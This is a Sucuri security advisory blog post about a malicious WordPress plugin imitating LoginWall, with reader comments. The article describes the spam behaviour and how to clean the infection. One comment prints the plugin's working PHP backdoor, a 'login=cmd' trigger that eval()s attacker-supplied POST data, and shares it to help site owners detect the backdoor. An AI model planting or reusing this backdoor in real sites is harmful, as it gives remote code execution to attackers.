• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WordPress Plugin Alert – LoginWall Imposter Exposed

June 10, 2014Rafael Capovilla

FacebookTwitterSubscribe

When you work with malware for a while, you start to become very good at pattern recognition. A couple sites in every hundred cleaned might be infected in a similar way, so remembering earlier problems helps to quickly solve the problem for the current site. You might not know exactly why something seems fishy at first, but you follow your instinct because something gnaws at you. Eventually, you start to see a pattern.

In the last couple of weeks we’ve noticed such a pattern when a bunch of websites were contaminated with malware from an infected plugin posing as a valid one called LoginWall.

The legitimate version of LoginWall is a SaaS-based solution that protects against brute force attacks for WordPress-based sites. LoginWall also doubles as a simple, but strong, password authentication tool for the admin account without using hardware tools. In short, it’s a nice plugin… as long as you’ve got the valid one.

How Do You Know If the Plugin is Valid?

First, remember that you should only trust plugins that are hosted within WordPress or directly from the author’s page. We wrote about this last month, but it’s important to keep hammering the point home.

Now, with this plugin it’s important to understand that we can’t simply trust the name presented in your /wp-admin plugin dashboard. As you can see, it looks almost the same as the original.

plugin

The next big difference between the original plugin and the malicious version is the folder name. The hacker made them similar, but it’s easy to spot the difference as long as you’re looking at the naming conventions side by side:

Here’s the original version:
/wp-content/plugins/loginwall-for-wp-beta/

And here’s the malicious version:
/wp-content/plugins/LoginWall-XyXYXY/

But What Does This Malicious Plugin Do?

The basic version of the fake plugin won’t change anything in your site’s content so you won’t get a hacked message or distribute malware. Instead, it will download spammy pages from remote locations and store them under LoginWall-XyXYXY/assets/. Those pages are crafted by mixing your site content and the spammy content to make the spam look more legitimate with the main goal to increase links and visits to other sites to make money.

That’s the basic version of the fake LoginWall plugin. However, we also found another version of the malicious content that embedded itself directly in the WordPress database. This new version is even trickier to spot because part of it is encoded in base64.

If you want to check for this hack then you’ll need to go to your database and view your wp_options table. Check every entry that has the autoload option and if you see entries like the following code, the malware payload has infected your site:

An example of a malware payload
There are also some other encoded entries. To get rid of these entries, first make a backup of the database (better safe than sorry) and then remove those records.

Conclusion

It is important to understand that all unprotected websites can be hacked. The key for site owners is to be aware of this and then to put tools in place to quickly identify when a site has been compromised. For instance, if the site that we just cleaned had been using our free plugin, its owner would have received a notice immediately alerting her to the website trouble.

Catching this at the moment it happens allows a website owner to take immediate action, including changing all passwords and removing the malicious plugin. It also keeps Google (and other search engines) from potentially blacklisting a domain and affecting customer trust in that domain or brand.

FacebookTwitterSubscribe

Categories: Security Advisory, WordPress SecurityTags: Brute Force, Website Backdoor, WordPress Plugins and Themes

About Rafael Capovilla

Rafael Capovilla is Sucuri’s Director of Software Development who joined the company in 2014. Rafael’s main responsibilities include keeping the infrastructure safe and running, and dealing with large DDoS attacks. His professional experience covers more than 15 years of system and network administration focused on security. You can follow him on Twitter @rmcapovilla

Reader Interactions

Comments

  1. Denis Sinegubko

    June 11, 2014

    Just a note, actually such “added” spammy sections on your site may result in Google marking your sites as “may be hacked” in search results. So don’t forget to regularly check your site search results in Google and look through reports in Google Webmaster Tools where you may notice suspicious search requests and indexed pages.

  2. javy

    June 30, 2014

    I’ve also found some base64 encodings in index.php in doc root, FYI for anyone who may be trying to clean this up.

  3. H.S.

    August 1, 2014

    “Eventually, you start to see the pattern.” or go crazy.

  4. John R

    September 9, 2014

    A customer got hacked with the “Christian-Loboutin” spam links being displayed to Google by the site’s default index page. This was NOT a wordpress site. It was an IIS server. Cleaned once, along with new passwords on all accounts (domain, host, ftp, email) associated with the site. A week later the code was again injected into the index page. In addition, amazingly, the hacker registered themselves with Google webmaster tools, loaded Google’s identification file, and Google approved them as an official webmaster of the site! Cleaned all that again, and scolded Google for participating in the hack job. The client did have some very old FrontPage files on their host, so that was removed. Safe for 2 months.

  5. mhimel

    July 25, 2015

    Thanks for this, which allowed me to confirm that the random new plugin was, in fact, likely a hack. I didn’t find any /assets, nor any weirdness in files or in the database on my quick review, though. Although I *did* find a couple odd IP addresses on the ‘remote database access’ list in cpanel, which of course I removed. It’s the second time I’ve seen something like that and just wanted to let people know to check that. I’m not quite sure how they’re connected, but hopefully bring WP up-to-date, changing passwords, etc. will help prevent it from recurring.

  6. Tony Owen

    January 6, 2016

    Great, now it would be nice if Securi would detect this in a scan….

    • Tony Perez

      January 7, 2016

      Hi Tony

      Are you experiencing this now? This is one of those infections that requires a server side scan, remote scanners would never pick it up. If you’re a customer and enable server-side scanning it’ll definitely pick it up.. Remote scanners can only see what is displayed on the client…

      Thanks

  7. Cathryn S

    August 11, 2016

    I signed in to Google Webmaster Tools and noticed a long list of suspicious search requests. Looked further and this plugin is showing on WordPress. Would anyone be able to help me with this? Thank you!

  8. DubbaThony

    November 23, 2016

    you didnt mention what is in one of those files – nasty backdoor
    here is code of this backdoor so you can find it.

    if($_GET[“login”]==”cmd”){
    if($_POST[‘coco123’]==”){
    echo(‘->|OK|-<');
    exit();
    }
    eval($_POST['coco123']);
    exit();}

    (its one-line code in the plugin. i just added endlines so it looks more clear)

    what it does, if random bot will ask site if it has its plugin (/wp-login?login=cmd) it will display plain "OK" – signal site has that crap. if you know that, than you can execute remotely ANY PHP code. any means it can 1 command wipe whole your database, all of on-site backups, for poorly administrated linux of unaware user, or worse apache running as root, it can easly destroy whole system. just because somebody installed that crap.

  9. Blue Presley

    January 14, 2018

    Does anyone know how this actually gets onto to server? Yesterday I installed a brand new installation of WordPress, and I hardened it per the wordpress codex. I installed it using WP-CLI on Ubuntu using the command line via ssh. I came back the next day to find a new plugin had been installed, this one. No one has had access to the server except for me and I didn’t download or install any updates since installing WP core. How could this have happened?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.